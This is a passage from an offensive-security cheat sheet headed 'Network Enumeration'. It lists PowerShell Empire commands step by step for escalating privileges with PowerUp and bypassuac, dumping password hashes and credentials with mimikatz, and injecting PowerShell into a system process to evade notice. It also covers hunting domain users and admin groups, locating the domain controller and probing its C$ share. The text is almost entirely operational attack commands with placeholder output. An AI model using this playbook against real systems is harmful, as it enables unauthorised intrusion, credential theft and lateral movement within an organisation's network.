2. NETWORK ENUMERATION
Interacting with Agent
(empire: ) > agents
(empire: ) > interact [agent-name]
Using powerup/allchecks module for privilege escalation
( Invoke all checks to find Privilege escalation then use BypassUAC)
(empire: agentname) > usemodule privesc/powerup/allchecks
(empire: agentname) > execute ( make sure itself vulnerable to bypass UAC)
(empire: agentname) > bypassuac [name of listener]
[>] Module is not opsec safe, run [y/N] > y
[if successful will create another agent with system privilege]
(empire: agentname) > back
(empire: agents) > list
Getting password hashes & creds (requires system/admin priv)
(empire: agentname) > mimikatz
(empire: agentname) > creds
Viewing Tokens on the local box
(empire: agentname) > usemodule credentials/tokens
(empire: agentname) > info
(empire: agentname) > execute
------------------------------------------------------------------------------------------------------------
Domain username processID
xxxxx xxxx 512
------------------------------------------------------------------------------------------------------------
Injecting Powershell into another process to blend with the environment
(empire: agentname) > usemodule management/psinject
(empire: agentname) > info
(empire: agentname) > set ProcID [512] (Identify the system process)
(empire: agentname) > set listener [nameoflistener]
(empire: agentname) > execute
[if successful will create another agent ]
Finding out more about particular user
(empire: agentname) > usemodule situational_awareness/network/powerview/get_user
(empire: agentname) > info
(empire: agentname) > set UserName [nameofuser] (name of a user )
(empire: agentname) > execute
Finding out where users are on the network
(empire: agentname) > usemodule situational_awareness/network/powerview/user_hunter
(empire: agentname) > info
(empire: agentname) > set UserName [nameofuser] (name of a user )
(empire: agentname) > execute
------------------------------------------------------------------------------------------------------------
xxx xxxx session from
xxxxx xxxx 10.1.12.15
------------------------------------------------------------------------------------------------------------
Return a list of all current users in a specified local group on local or remote host
(empire: agentname) > usemodule situational_awareness/network/powerview/get_localgroup
(empire: agentname) > info
(empire: agentname) > set GroupName [nameofgroup] (name of group Administrators )
(empire: agentname) > set HostName [ipoftgt] (Ip address of target)
(empire: agentname) > set Recurse True
(empire: agentname) > set Agent [nameofagent] (Should be there by default , if not add)
(empire: agentname) > execute
------------------------------------------------------------------------------------------------------------------------------------------
Identify any users that you have credential for, if they might be in administrator group
-----------------------------------------------------------------------------------------------------------------------------------------
Finding about Domain Controller
(empire: agentname) > usemodule situational_awareness/network/powerview/get_domaincontroller
(empire: agentname) > execute
------------------------------------------------------------------------------------------------------------
OSVersion
Domain
Ip Address
Name: FQDN
------------------------------------------------------------------------------------------------------------
(empire: agentname) > shell dir \\FQDN\c$ (checking if we can list c: Drive)
[Result of dir ]